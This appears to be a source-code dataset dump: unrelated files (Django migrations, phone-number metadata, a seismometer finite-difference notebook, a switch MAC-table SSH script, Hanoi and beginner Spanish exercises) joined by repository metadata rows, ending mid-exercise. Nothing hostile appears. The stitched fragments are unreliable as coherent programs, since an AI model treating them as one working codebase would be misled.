        tap_parameters={"tags": {"tag1": "value1", "tag2": "value2"}},
    )
    print(result)
# x-ms-original-file: specification/network/resource-manager/Microsoft.Network/stable/2023-04-01/examples/VirtualNetworkTapUpdateTags.json
# Run the sample only when executed as a script, not on import.
if __name__ == "__main__":
    main()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
627ad397bc9cac97d59ee45e981aabac63839ec2 | 1e8142725aa06844713d18fa38c6779aff8f8171 | /tndata_backend/goals/migrations/0039_auto_20150501_1332.py | 47957608f0a0fba364284a0e0abc1a51866ca164 | [
"MIT"
] | permissive | tndatacommons/tndata_backend | 8f4db3e5cf5272901c9087a85e21d7560240bb3b | 3d22179c581ab3da18900483930d5ecc0a5fca73 | refs/heads/master | 2020-12-03T07:53:17.339769 | 2017-03-27T06:18:58 | 2017-03-27T06:18:58 | 68,407,220 | 1 | 2 | null | 2017-03-27T06:18:59 | 2016-09-16T18:59:16 | Python | UTF-8 | Python | false | false | 3,086 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Metadata-only migration for the goals app.

    Every operation is an AlterField that updates help_text, uniqueness,
    indexing or blank/null settings on Action, Behavior, Category and Goal
    fields; no data rows are created or modified.
    """

    dependencies = [
        ('goals', '0038_remove_behavior_categories'),
    ]

    operations = [
        # --- Action: optional description/notification text, unique indexed title ---
        migrations.AlterField(
            model_name='action',
            name='description',
            field=models.TextField(help_text='A brief (250 characters) description about this item.', blank=True),
        ),
        migrations.AlterField(
            model_name='action',
            name='notification_text',
            field=models.CharField(help_text='Text of the notification (50 characters)', max_length=256, blank=True),
        ),
        migrations.AlterField(
            model_name='action',
            name='title',
            field=models.CharField(db_index=True, unique=True, max_length=256, help_text='A unique title for this item (50 characters)'),
        ),
        # --- Behavior: same treatment, plus the informal action list ---
        migrations.AlterField(
            model_name='behavior',
            name='description',
            field=models.TextField(help_text='A brief (250 characters) description about this item.', blank=True),
        ),
        migrations.AlterField(
            model_name='behavior',
            name='informal_list',
            field=models.TextField(help_text='Use this section to create a list of specific actions for this behavior. This list will be reproduced as a mnemonic on the Action entry page', blank=True),
        ),
        migrations.AlterField(
            model_name='behavior',
            name='notification_text',
            field=models.CharField(help_text='Text of the notification (50 characters)', max_length=256, blank=True),
        ),
        migrations.AlterField(
            model_name='behavior',
            name='title',
            field=models.CharField(db_index=True, unique=True, max_length=256, help_text='A unique title for this item (50 characters)'),
        ),
        # --- Category: required description, shorter unique indexed title ---
        migrations.AlterField(
            model_name='category',
            name='description',
            field=models.TextField(help_text='A short (250 character) description for this Category'),
        ),
        migrations.AlterField(
            model_name='category',
            name='title',
            field=models.CharField(db_index=True, unique=True, max_length=128, help_text='A Title for the Category (50 characters)'),
        ),
        # --- Goal: optional description/icon, unique indexed title ---
        migrations.AlterField(
            model_name='goal',
            name='description',
            field=models.TextField(help_text='A short (250 character) description for this Goal', blank=True),
        ),
        migrations.AlterField(
            model_name='goal',
            name='icon',
            field=models.ImageField(null=True, upload_to='goals/goal', help_text='Upload an icon (256x256) for this goal', blank=True),
        ),
        migrations.AlterField(
            model_name='goal',
            name='title',
            field=models.CharField(db_index=True, unique=True, max_length=256, help_text='A Title for the Goal (50 characters)'),
        ),
    ]
| [
"brad@bradmontgomery.net"
] | brad@bradmontgomery.net |
5ab68abc62761c0926aa94485ba9a542df2e4131 | 3bf6b373547dae4eca53af9a9271745085632209 | /backend/home/migrations/0002_load_initial_data.py | f06014022267c67e7065dad06b6386bfcd0562c7 | [] | no_license | crowdbotics-apps/fruit-of-peace-18240 | 282f78884ed4763c5bee3609ff2184d856215d5e | b24c20465987c185a7bc39269a5166cbed287752 | refs/heads/master | 2022-11-06T01:14:57.924906 | 2020-06-19T00:08:33 | 2020-06-19T00:08:33 | 273,361,641 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,310 | py | from django.db import migrations
def create_customtext(apps, schema_editor):
    """Seed the home.CustomText table with the app's display title."""
    custom_text_model = apps.get_model("home", "CustomText")
    custom_text_model.objects.create(title="Fruit Of Peace")
def create_homepage(apps, schema_editor):
    """Insert the default landing-page body into home.HomePage."""
    body = """
<h1 class="display-4 text-center">Fruit Of Peace</h1>
<p class="lead">
This is the sample application created and deployed from the Crowdbotics app.
You can view list of packages selected for this application below.
</p>"""
    home_page_model = apps.get_model("home", "HomePage")
    home_page_model.objects.create(body=body)
def create_site(apps, schema_editor):
    """Create or update the django.contrib.sites Site row (pk=1) for this app."""
    site_model = apps.get_model("sites", "Site")
    custom_domain = "fruit-of-peace-18240.botics.co"
    params = {
        "name": "Fruit Of Peace",
    }
    # Only set the domain when one was configured for the deployment.
    if custom_domain:
        params["domain"] = custom_domain
    site_model.objects.update_or_create(defaults=params, id=1)
class Migration(migrations.Migration):
    """Data migration: seed the custom text, home page and site rows."""

    dependencies = [
        ("home", "0001_initial"),
        ("sites", "0002_alter_domain_unique"),
    ]

    operations = [
        # No reverse functions are supplied, so this migration cannot be
        # unapplied (Django raises IrreversibleError on reverse).
        migrations.RunPython(create_customtext),
        migrations.RunPython(create_homepage),
        migrations.RunPython(create_site),
    ]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
7f3c2dc97ed990179b60119f2568b0b551417524 | e73d4b7bb0bbbc6f547a9bac7b5a2a97059fbb4f | /cicd_project/blog/models.py | 5c2b726e65984ebda2bda432f0c063942242e473 | [] | no_license | soohyun-lee/cicd_dev | 0d7ad568cfafd07d940a9938ae2a2f624b8556f7 | 472048d4c46ca283ede9490206055c00eabcea07 | refs/heads/main | 2023-08-11T01:25:43.000435 | 2021-08-10T01:51:06 | 2021-08-10T01:51:06 | 394,487,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | from django.db import models
from django.db.models.fields import CharField
class Booklist(models.Model):
    """A single book entry in the blog's book list."""

    # Display name of the entry; nullable at the database level.
    name = CharField(max_length=100, null=True)
    # Category label for the entry; nullable at the database level.
    category = CharField(max_length=40, null=True)

    class Meta:
        # Explicit (camelCase) table name instead of the default app_booklist.
        db_table = 'bookList'
"soohyun527@gmail.com"
] | soohyun527@gmail.com |
ff1f87d47ce4289fd8848474d974dcd85f9435dc | d7f89062dc6524f2ed3b5bee349fe3f06246ffab | /chainercv/visualizations/__init__.py | 9449ed8a8e6c45c096b9d72f8ce91fadae2e2e4c | [
"MIT"
] | permissive | fukatani/chainercv | d9943afa1eb2465a36a23ffee08d4414ffa7ed84 | 49acfb2bd76742237e8cd3e8ce132de357b58c4d | refs/heads/master | 2021-09-10T14:06:49.348027 | 2018-03-23T03:52:51 | 2018-03-23T03:52:51 | 114,512,105 | 0 | 0 | null | 2017-12-17T05:32:51 | 2017-12-17T05:32:50 | null | UTF-8 | Python | false | false | 290 | py | from chainercv.visualizations.vis_bbox import vis_bbox # NOQA
from chainercv.visualizations.vis_image import vis_image # NOQA
from chainercv.visualizations.vis_point import vis_point # NOQA
from chainercv.visualizations.vis_semantic_segmentation import vis_semantic_segmentation # NOQA
| [
"yuyuniitani@gmail.com"
] | yuyuniitani@gmail.com |
53990e9e54df628151cb3075384dd3ecd9f10e89 | a5882e39df9fb1ded1a3941c4b43646010dc2c3a | /can-funds-be-transferred-b.py | 04691eb50e4ef5e978febaecdf8c3f32ac4bf31d | [] | no_license | hlltarakci/hackerrank | d58c8761cf21a64fd6f85bb6f82ae7a3964e7cf1 | fb5adf854f528ac46330c45172f93dfcd37aed49 | refs/heads/master | 2020-03-27T08:49:52.519889 | 2018-08-24T06:40:08 | 2018-08-24T06:40:08 | 146,291,257 | 1 | 0 | null | 2018-08-27T11:58:55 | 2018-08-27T11:58:55 | null | UTF-8 | Python | false | false | 2,060 | py | #!/usr/bin/env python3
import functools
import itertools
# # Use this function to write data to socket
# # write_string_to_socket(connection, message) where connection is the socket object and message is string
# # Use this function to read data from socket
# # def read_string_from_socket(connection) where connection is the socket object
# # All global declarations go here
# Tree tables populated by init_server(); indexed by node id (1-based).
parents = None        # parents[v] -> parent node of v (None for root / index 0)
parent_probs = None   # parent_probs[v] -> probability on the edge v -> parent(v)
# # This function is called only once before any client connection is accepted by the server.
# # Read any global datasets or configurations here
def init_server():
    """Load the tree training data into the module-level tables.

    Reads ``training.txt``: the first line holds the node count N, followed
    by N-1 lines formatted as ``u,v,p`` meaning u is v's parent with edge
    probability p percent.  Populates ``parents`` and ``parent_probs``
    (1-based node ids; index 0 and the root remain None).
    """
    global parents, parent_probs
    print("Reading training set")
    # 'with' guarantees the file handle is closed even if parsing fails
    # (the original opened the file and never closed it).
    with open("training.txt") as f:
        N = int(f.readline())
        parents = [None] * (N + 1)
        parent_probs = [None] * (N + 1)
        for _ in range(N - 1):
            u, v, p = map(int, f.readline().split(","))
            parents[v] = u
            parent_probs[v] = p / 100
# # This function is called everytime a new connection is accepted by the server.
# # Service the client here
def process_client_connection(connection):
    """Serve one client session over the given connection.

    Protocol: each request is "a,b,q1"; the reply is "YES" when the path
    probability between nodes a and b exceeds 10**q1, otherwise "NO".
    An "END" request is echoed back and terminates the session.
    """
    while True:
        message = read_string_from_socket(connection).decode()
        print("Message received = ", message)
        if message == "END":
            reply = message
        else:
            parts = message.split(",")
            node_a, node_b = int(parts[0]), int(parts[1])
            threshold = pow(10, float(parts[2]))
            reply = "YES" if compute_distance(node_a, node_b) > threshold else "NO"
        write_string_to_socket(connection, reply.encode())
        if message == "END":
            return
path_a = find_path(a)
path_b = find_path(b)
while path_a and path_b and path_a[-1] == path_b[-1]:
del path_a[-1]
del path_b[-1]
return functools.reduce(lambda x, y: x * y, map(lambda n: parent_probs[n], itertools.chain(path_a, path_b)))
def find_path(n):
    """Return the list of nodes from n up to the root, starting with n."""
    node = n
    chain = [node]
    while True:
        ancestor = parents[node]
        if not ancestor:
            break
        chain.append(ancestor)
        node = ancestor
    return chain
| [
"charles.wangkai@gmail.com"
] | charles.wangkai@gmail.com |
0c349048cf8dcc51df1a847c1a3fa879b204b10a | d1808d8cc5138489667b7845466f9c573591d372 | /notebooks/Computational Seismology/The Finite-Difference Method/fd_seismometer_solution.py | 154d22e4b1082f796247ce50c3d5933ed4f2c6e6 | [] | no_license | krischer/seismo_live | e140777900f6246a677bc28b6e68f0a168ec41ab | fcc615aee965bc297e8d53da5692abb2ecd6fd0c | refs/heads/master | 2021-10-20T22:17:42.276096 | 2019-11-27T23:21:16 | 2019-11-28T10:44:21 | 44,953,995 | 69 | 59 | null | 2020-05-22T11:00:52 | 2015-10-26T08:00:42 | Python | UTF-8 | Python | false | false | 8,047 | py | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <div style='background-image: url("../../share/images/header.svg") ; padding: 0px ; background-size: cover ; border-radius: 5px ; height: 250px'>
# <div style="float: right ; margin: 50px ; padding: 20px ; background: rgba(255 , 255 , 255 , 0.7) ; width: 50% ; height: 150px">
# <div style="position: relative ; top: 50% ; transform: translatey(-50%)">
# <div style="font-size: xx-large ; font-weight: 900 ; color: rgba(0 , 0 , 0 , 0.8) ; line-height: 100%">Computational Seismology</div>
# <div style="font-size: large ; padding-top: 20px ; color: rgba(0 , 0 , 0 , 0.5)">Finite Differences - Seismometer Equation</div>
# </div>
# </div>
# </div>
# <p style="width:20%;float:right;padding-left:50px">
# <img src=../../share/images/book.jpg>
# <span style="font-size:smaller">
# </span>
# </p>
#
#
# ---
#
# This notebook is part of the supplementary material
# to [Computational Seismology: A Practical Introduction](https://global.oup.com/academic/product/computational-seismology-9780198717416?cc=de&lang=en&#),
# Oxford University Press, 2016.
#
#
# ##### Authors:
# * Ashim Rijal ([@ashimrijal](https://github.com/ashimrijal))
# * Heiner Igel ([@heinerigel](https://github.com/heinerigel))
#
# This exercise covers the following aspects:
#
# * Solving seismometer equation with finite difference method
# * Getting familiar with seismometer response function
# ---
# ## Basic Equations
#
# ** Please refer to the Exercise 4.19 from the book.**
#
# The seismometer equation is given by
# $$
# \ddot{x} + 2\epsilon \dot{x} + \omega^2_0 x = - \ddot{u}
# $$
#
# Where,
#
# $ \epsilon $ is the damping parameter,
#
# $ \omega_0 $ is the eigenfrequency,
#
# $ \ddot{u}(t) $ is the ground motion by which the seismometer is excited, and
#
# $ x(t) $ is the motion of the seismometer mass.
#
# We replace the time derivative by centered finite-differentiation
# $$
# \dot{x} \ \approx \ \frac{x (t + \mathrm{d}t) - x ( t- \mathrm{d}t)} {2\mathrm{d}t}
# $$
#
# $$
# \ddot{x} \ \approx \ \frac{x( t+ \mathrm{d}t)-2x(t) + x( t- \mathrm{d}t)} {\mathrm{d}t^2}
# $$
#
# Now, solving for $ x(t+\mathrm{d}t) $ the extrapolation scheme is
#
# $$
# x(t+\mathrm{d}t) = \frac{ - \ddot{u}(t) \mathrm{d}t^2 + (2-\omega^2_0 \mathrm{d}t^2) x(t) + (\epsilon \mathrm{d}t-1) x(t-\mathrm{d}t)} {(1+\epsilon \mathrm{d}t)}
# $$
#
# ### Exercise
#
# ** Part 1**
#
# While running the following cells frequency of forcing (the frequency of ground motion) and the damping parameter will be asked to enter. First try using undamped seismometer (i.e. h = 0) for some forcing frequency (eg. 0.1 Hz, 1 Hz, 2Hz, 3Hz, 4Hz, 5Hz, etc.) and interpret the results.
#
# ** Part 2**
#
# Now try frequency of forcing of your choice (eg. 1 HZ) and try to search for suitable damping parameter (h).
#
# **Message: Once you become familiar with all the codes below you can go to the Cell tab on the toolbar and click Run All.**
# + {"code_folding": [0]}
# Configuration step (please run it before the simulation code!)
import numpy as np
import matplotlib
# Select the interactive notebook backend so the plot updates in place.
matplotlib.use("nbagg")
import matplotlib.pyplot as plt
matplotlib.rcParams['figure.facecolor'] = 'w'  # white figure background (remove grey)
# + {"code_folding": []}
# Initialization of parameters
f0 = 1.        # eigenfrequency of the seismometer (Hz)
w = 2. * np.pi * f0   # eigenfrequency in radians per second
dt = .01       # time increment for the numerical scheme (s)
isnap = 2      # plot refresh interval (redraw every isnap time steps)

# Central frequency of forcing or ground motion (will be asked)
fu0 = 1.0
# Uncomment for interactivity.
# fu0 = float(input('Give frequency of forcing (e.g. f=1 Hz) : '))

# Damping parameter of seismometer (will be asked)
h = 0.5
# Uncomment for interactivity.
# h = float(input('Give damping parameter (e.g. h=0.5) : '))

# Initialize ground motion
# Initialize parameters for ground motion
p = 1. / fu0            # dominant period of the forcing (s)
nts = int(2. * p / dt)  # number of time steps covering two periods
uii = np.zeros(nts)     # ground-motion (forcing) time series
t0 = p / dt             # pulse centre, expressed in time steps (samples)
a = 4. / p              # half-width parameter of the Gaussian (so-called sigma)
# we use the derivative of a Gaussian as our ground motion
for it in range(nts):
    t = (it - t0) * dt
    uii[it] = -2 * a * t * np.exp(-(a * t) ** 2)

nt = int(round(5. * 1. / fu0 / dt))  # total number of time steps
src = np.zeros(nt)        # initialize the source (forcing) array
src[0:len(uii)] = uii     # place the Gaussian derivative at the start
# End initialization of ground motion

# Initial conditions: seismometer mass at rest
eps = h * w               # damping term: eps = h * omega_0
x = np.zeros(nt)          # mass displacement history
xnow = 0                  # x(t), present value
xold = 0                  # x(t - dt), past value
x_vector = np.zeros(nt)   # copy of x used for plotting
# + {"code_folding": [33]}
# Extrapolation scheme and the plots

# Initialization of plots
# lines1 plots the seismometer response and lines2 the source function.
# NOTE(review): x is all zeros here, so np.max(np.abs(x[0:nt])) is 0 and this
# first normalization divides by zero (NaNs in the initial frame) — confirm
# whether that is intended; the loop below overwrites the plot anyway.
lines1 = plt.plot(np.dot((np.arange(1, nt+1)), dt), x_vector[0:nt] /
                  np.max(np.abs(x[0:nt])), color = "red", lw = 1.5, label="Seismometer response")
lines2 = plt.plot(np.zeros(nt), color = 'blue',lw = 1.5, label="Ground Acceleration")
plt.title("At rest")
plt.axis([0, nt*dt, -1, 1])
plt.xlabel("Time (s)")
plt.ylabel("Displacement")
plt.legend(loc="upper right")
plt.ion()
plt.show()

# Begin extrapolation and update the plot
# Centered finite differences give the explicit update:
# x(t+dt) = (-u''(t) dt^2 + (2 - w^2 dt^2) x(t) + (eps dt - 1) x(t-dt)) / (1 + eps dt)
for i in range(nt):
    if i == 0:
        xold = xnow  # first step: no past value yet, start from rest
    xnew = (-src[i] * dt ** 2 + (2 - w ** 2 * dt ** 2) * xnow + (eps * dt - 1) * xold) / (1 + eps * dt)
    xold = xnow  # for the next step the present becomes the past
    xnow = xnew  # and the future becomes the present
    x[i] = xnow
    x_vector[i] = x[i]

    # Update the plots every isnap-th step: remove the old line artists and
    # redraw response and source up to the current sample, both normalized.
    if not i % isnap:
        for l in lines1:
            l.remove()
            del l
        for k in lines2:
            k.remove()
            del k
        lines1 = plt.plot(np.dot((np.arange (1, i+1)), dt), x_vector[0:i] /
                          np.max(np.abs (x[0:nt])),color = "red",lw = 1.5, label="Seismometer response")
        lines2 = plt.plot(np.dot((np.arange (1, i+1)), dt), src[0:i] /
                          np.max(src[0:nt]), color = 'blue',lw = 1.5, label="Ground Acceleration")
        plt.title("F0 = 1Hz, SRC = %.2f Hz, h = %.2f " % (fu0, h))
        plt.gcf().canvas.draw()

plt.ioff()
plt.show()
# + {"tags": ["solution"], "cell_type": "markdown"}
# ## Solutions
# **Part 1**
#
# Let us try frequency of forcing 1 Hz and damping parameter h = 0. Then we see that response of seismometer doesn't come to rest even after the ground motion comes to rest.
#
# ** Part 2**
#
# For low damping (h < 1) the response function has a peak: the underdamped case. If h = 1, the seismometer comes to rest in the least possible time without overshooting, a case called critically damped, where the response curve has no peak. The most common values used in seismometers are close to critical (e.g. 0.707), at which seismometers perform optimally. For values greater than 1 (h > 1) the sensitivity of the seismometer decreases, the case of overdamping.
| [
"lion.krischer@gmail.com"
] | lion.krischer@gmail.com |
87ab9929f76972431b26c279e2ae1beb0af37277 | 4ada7aa922154f5aefd2c5ae83ea5e4e3a392c6d | /Python/algorithm/hanoi_tower/하노이의탑.py | 4b6aa799cc2666c9cf56270080be00b7825ea21b | [
"MIT"
] | permissive | sug5806/TIL | ae483c0efc5c45f133993d1bd95a411fc6501140 | 2309d8a270e4a7b8961268a40b6492c5db317e37 | refs/heads/master | 2022-12-21T03:20:24.393316 | 2019-09-26T14:04:25 | 2019-09-26T14:04:25 | 180,498,457 | 0 | 0 | MIT | 2022-12-08T05:48:15 | 2019-04-10T03:56:28 | Go | UTF-8 | Python | false | false | 357 | py | n = 0
a = "A"  # source peg
b = "B"  # auxiliary (middle) peg
c = "C"  # destination peg
def hanoi(n, a, b, c):
    """Solve Towers of Hanoi: move n disks from peg a to peg c via peg b.

    Prints one line per move ("{disk}번째 원반을 {peg}로 이동").
    """
    # Move the n-1 smaller disks out of the way onto the auxiliary peg.
    if n > 1:
        hanoi(n - 1, a, c, b)
    # Move the current (largest remaining) disk to the destination.
    print("{}번째 원반을 {}로 이동".format(n, c))
    # Bring the n-1 smaller disks from the auxiliary peg onto it.
    if n > 1:
        hanoi(n - 1, b, a, c)
if __name__ == "__main__":
    # Solve the 3-disk puzzle, moving from peg A to peg C via B.
    hanoi(3, a, b, c)
| [
"sug5806@gmail.com"
] | sug5806@gmail.com |
32bdcc38967b67dbf751a35e5b61bee09851481f | 06c367fe2d2233c6efb64f323e15bebd7f48c625 | /venv/lib/python3.6/site-packages/phonenumbers/data/region_SJ.py | c90ff44f85e3f8c821321de9306a08f67ec87f90 | [
"BSD-3-Clause"
] | permissive | AkioSky/FishMart | ce630bc4addf63bc105e4f3e13e92c15b119b558 | 1d01d7e79812dc7cccb1b26ffc6457af6104d9f2 | refs/heads/master | 2022-12-11T16:13:38.277080 | 2019-04-22T03:44:22 | 2019-04-22T03:44:22 | 182,615,627 | 0 | 0 | BSD-3-Clause | 2022-12-08T01:44:37 | 2019-04-22T03:20:03 | Python | UTF-8 | Python | false | false | 1,503 | py | """Auto-generated file, do not edit by hand. SJ metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
# Numbering metadata for Svalbard & Jan Mayen (region "SJ", country calling
# code +47, shared with Norway).  Each PhoneNumberDesc pairs a national-number
# validation regex with an example number and the set of valid lengths.
# This file is auto-generated (see header) — regenerate rather than hand-edit.
PHONE_METADATA_SJ = PhoneMetadata(id='SJ', country_code=47, international_prefix='00',
    general_desc=PhoneNumberDesc(national_number_pattern='(?:0|(?:[4589]\\d|79)\\d\\d)\\d{4}', possible_length=(5, 8)),
    fixed_line=PhoneNumberDesc(national_number_pattern='79\\d{6}', example_number='79123456', possible_length=(8,)),
    mobile=PhoneNumberDesc(national_number_pattern='(?:4[015-8]|5[89]|9\\d)\\d{6}', example_number='41234567', possible_length=(8,)),
    toll_free=PhoneNumberDesc(national_number_pattern='80[01]\\d{5}', example_number='80012345', possible_length=(8,)),
    premium_rate=PhoneNumberDesc(national_number_pattern='82[09]\\d{5}', example_number='82012345', possible_length=(8,)),
    shared_cost=PhoneNumberDesc(national_number_pattern='810(?:0[0-6]|[2-8]\\d)\\d{3}', example_number='81021234', possible_length=(8,)),
    personal_number=PhoneNumberDesc(national_number_pattern='880\\d{5}', example_number='88012345', possible_length=(8,)),
    voip=PhoneNumberDesc(national_number_pattern='85[0-5]\\d{5}', example_number='85012345', possible_length=(8,)),
    uan=PhoneNumberDesc(national_number_pattern='(?:0\\d|81(?:0(?:0[7-9]|1\\d)|5\\d\\d))\\d{3}', example_number='01234', possible_length=(5, 8)),
    voicemail=PhoneNumberDesc(national_number_pattern='81[23]\\d{5}', example_number='81212345', possible_length=(8,)),
    leading_digits='79')
| [
"whitebirdinbluesky1990@gmail.com"
] | whitebirdinbluesky1990@gmail.com |
0b7613ed687f0eb0d89c213de50cb5dfaf7140cd | be4459658d667c47eefeeb3cf689a678042edb94 | /scripts/cloud/get_switch_known_macs.py | f796984baaffda0fb49ebb51e388f5873d9760cc | [
"Apache-2.0"
] | permissive | kparr/RIFT.ware-1 | 7945174aa23ac1f7d74a7464b645db5824982fc3 | 6846108d70b80b95c5117fdccd44ff058ac605be | refs/heads/master | 2021-01-13T08:36:03.751610 | 2016-07-24T21:36:15 | 2016-07-24T21:36:15 | 72,420,438 | 0 | 0 | null | 2016-10-31T09:11:27 | 2016-10-31T09:11:27 | null | UTF-8 | Python | false | false | 1,099 | py | #!/usr/bin/env python
#
# (c) Copyright RIFT.io, 2013-2016, All Rights Reserved
#
import subprocess
import re
import os
import sys
# NOTE: this is Python 2 code (print statements, dict.iteritems).
# Map of MAC address -> switch name on which it was learned.
macs = dict()

# CLI commands piped to each switch: disable paging, dump MAC table, quit.
cmds='''terminal length 0
show mac-address-table
q
'''

# Matches a dynamic MAC-table entry on a TenGigabit port; captures
# group(1) = MAC address, group(2) = port number.
re1 = re.compile('\s*[0-9]+\s+([0-9a-f:]+)\s+Dynamic\s+Te\s+0/([0-9]+)\s+Active')
devnull = open(os.devnull, "w")  # discard ssh stderr (host-key warnings etc.)
DEBUG = 'DEBUG' in sys.argv

for swnum in range(3):
    # Switch naming scheme f10-gruntNN.
    sw = "f10-grunt%02d" % swnum
    p = subprocess.Popen(["ssh", "-o", "StrictHostKeyChecking=no", "admin@%s" % sw ], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=devnull )
    (stdout, stderr) = p.communicate(cmds)

    # First pass: count MACs per port so trunk/uplink ports (which learn many
    # addresses) can be skipped.  NOTE(review): assumes port numbers < 64.
    counts=[0 for m in range(64)]
    for line in stdout.split('\n'):
        m = re1.match(line)
        if m is not None:
            counts[int(m.group(2))] += 1
        else:
            if DEBUG: print line
    # Second pass: record only MACs on ports with fewer than 3 addresses,
    # i.e. likely directly-attached hosts.
    for line in stdout.split('\n'):
        m = re1.match(line)
        if m is not None:
            port = int(m.group(2))
            if counts[port] < 3:
                macs[m.group(1)] = sw
            else:
                if DEBUG: print 'skipping %s' % port

for mac, sw in macs.iteritems():
    print "%s %s" % ( mac, sw)
| [
"Jeremy.Mordkoff@riftio.com"
] | Jeremy.Mordkoff@riftio.com |
ad0ed729ddbfca606c205b7712f4b6e4b02deb5d | 9083924b324cd31f1143f54effd46b2a0ea62664 | /Algoritmia/Semana2/Taller1.py | ceeefe4f52ac2f9274ed906d8cd8fd26ab47e637 | [] | no_license | dcardonac31/diplomado_comfenalco | ee0321d8bba4dd31780a22d26524bcb4d8fe28bf | ce51923b927130963750ede1aadd2d671859f12b | refs/heads/master | 2023-05-19T18:57:09.004508 | 2021-06-14T00:47:29 | 2021-06-14T00:47:29 | 372,342,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,804 | py | print(" EJERCICIOS CON DECISIONES LÓGICAS TALLER 1")
# Exercise 1: read the name and age of two (non-twin) siblings and report
# the name of the older one.
print("1. Elabore un algoritmo que permita averiguar cuál es el nombre del mayor de 2 hermanos no gemelos. Como datos de entrada se tiene el nombre y la edad de las 2 personas.")
nombre1 = input("Nombre hermano 1: ")
edad1 = int(input("Ingrese edad hermano 1: "))
nombre2 = input("Nombre hermano 2: ")
edad2 = int(input("Ingrese edad hermano 2: "))
nombreMayor = nombre1  # default: sibling 1, overridden below if 2 is older
if edad1 < edad2:
    nombreMayor = nombre2
print(f"El hermano mayor es: {nombreMayor}")
print("---------------------------")
# Exercise 2: classify a person by age range per the statement below.
print("2. Elaborar un algoritmo que muestre un mensaje según la edad ingresada; niño (menor de 10 años), preadolescente (mayor o igual a 10años y menor o igual a 14 años), un adolescente (mayor o igual a 15 años y menor o igual a 18 años), adulto (mayor o igual a 19 años y menor o igual a 50 años), adulto mayor (mayor de 50 años).")
edad = int(input("Ingrese edad: "))
categoria = 'niño'  # default: under 10
if edad >= 10 and edad < 15:
    categoria = 'preadolescente'
elif edad >= 15 and edad < 19:
    categoria = 'adolescente'
elif edad >= 19 and edad <= 50:
    # Per the statement "adulto" includes age 50 exactly; the original used
    # 'edad < 50', misclassifying 50 as 'adulto mayor'.
    categoria = 'adulto'
elif edad > 50:
    categoria = 'adulto mayor'
print(f"La persona es: {categoria}")
print("---------------------------")
# Exercise 3: read name, gross salary, deductions and bonuses for two
# workers and print the name of the one with the higher net salary.
print(" 3. Elabore un algoritmo que lea el nombre, el salario bruto, las deducciones y las bonificaciones de dos trabajadores, e imprima (escriba un mensaje) el nombre del que más salario neto tiene.")
nombre1 = input("Nombre empleado 1: ")
salario1 = float(input("Ingrese salario empleado 1: "))
deducciones1 = float(input("Ingrese deducciones empleado 1: "))
bonificaciones1 = float(input("Ingrese bonificaciones empleado 1: "))
salarioNeto1 = salario1 - deducciones1 + bonificaciones1
nombre2 = input("Nombre empleado 2: ")
salario2 = float(input("Ingrese salario empleado 2: "))
deducciones2 = float(input("Ingrese deducciones empleado 2: "))
bonificaciones2 = float(input("Ingrese bonificaciones empleado 2: "))
salarioNeto2 = salario2 - deducciones2 + bonificaciones2
nombreMayor = nombre1  # default: worker 1 (overridden below)
if salarioNeto1 < salarioNeto2:
    nombreMayor = nombre2
elif salarioNeto1 == salarioNeto2:
    nombreMayor = 'Iguales'  # equal net salaries
print(f"El empleado con mejor salario es: {nombreMayor}")
print("---------------------------")
# Exercise 4: for two buses (plate, passenger count, fare) print the plate
# of the bus that collected the most money.
print(" 4. Crear un algoritmo que le permita al usuario ingresar los datos de dos buses así: Placa, El número de pasajeros transportado y el valor del pasaje, y el computador le muestre la placa del bus que más dinero recogió.")
placa1 = input("Placa 1: ")
numeroPasajeros1 = int(input("Ingrese numero pasajeros bus 1: "))
valorPasaje1 = int(input("Ingrese valor pasaje bus 1: "))
recaudoBus1 = numeroPasajeros1 * valorPasaje1
placa2 = input("Placa 2: ")
numeroPasajeros2 = int(input("Ingrese numero pasajeros bus 2: "))
valorPasaje2 = int(input("Ingrese valor pasaje bus 2: "))
recaudoBus2 = numeroPasajeros2 * valorPasaje2
placaMayor = placa1  # default: bus 1 (overridden below)
if recaudoBus1 < recaudoBus2:
    placaMayor = placa2
elif recaudoBus1 == recaudoBus2:
    placaMayor = 'Iguales'  # both buses collected the same amount
print(f"El bus con mayor recaudo es: {placaMayor}")
print("---------------------------")
# Exercise 5: revenue for one bus; route A charges $1.200, route B $1.000.
print(" 5. Elaborar un algoritmo donde el usuario ingrese la placa de un bus, el número de pasajeros transportados y la ruta donde prestó el servicio (A o B) el computador le debe mostrar el dinero que recolectó sabiendo que en la ruta A el pasaje es a $1.200 y en la B a $1.000.")
placa = input("Placa: ")
numeroPasajeros = int(input("Ingrese numero pasajeros: "))
ruta = input("Ingrese ruta (A o B): ")
# NOTE(review): the comparison is case-sensitive — a lowercase 'a' falls into
# the $1.000 branch; confirm whether the input should be normalized first.
if ruta == 'A':
    valorPasaje = 1200
else:
    valorPasaje = 1000
recaudoBus = numeroPasajeros * valorPasaje
print(f"Valor recaudo : ${recaudoBus}")
print("---------------------------")
# Exercise 6: net salary for FIJO (permanent) vs TEMPORAL workers.
print(" 6. Crear un algoritmo que le permita al usuario ingresar el tipo de trabajador (FIJO o TEMPORAL) y con base en esto pueda imprimir el nombre y el salario neto, sabiendo que si es FIJO debe leer el nombre, el número de horas trabajadas, el salario básico hora, el total de deducciones y el total de bonificaciones y si es TEMPORAL solo debe leer el nombre y el número de horas trabajadas; estos trabajadores tienen un salario básico hora fijo de $6.000 y no tienen deducciones ni bonificaciones.")
# Normalize to upper case BEFORE validating and join the conditions with
# 'and': the original used 'or' (true for every input, so the loop never
# terminated) and only applied .upper() after the loop.
tipoTrabajador = input("ingresar el tipo de trabajador (FIJO o TEMPORAL): ").upper()
while tipoTrabajador != 'FIJO' and tipoTrabajador != 'TEMPORAL':
    tipoTrabajador = input("ingresar el tipo de trabajador (FIJO o TEMPORAL): ").upper()
if tipoTrabajador == 'FIJO':
    nombre = input("Nombre empleado : ")
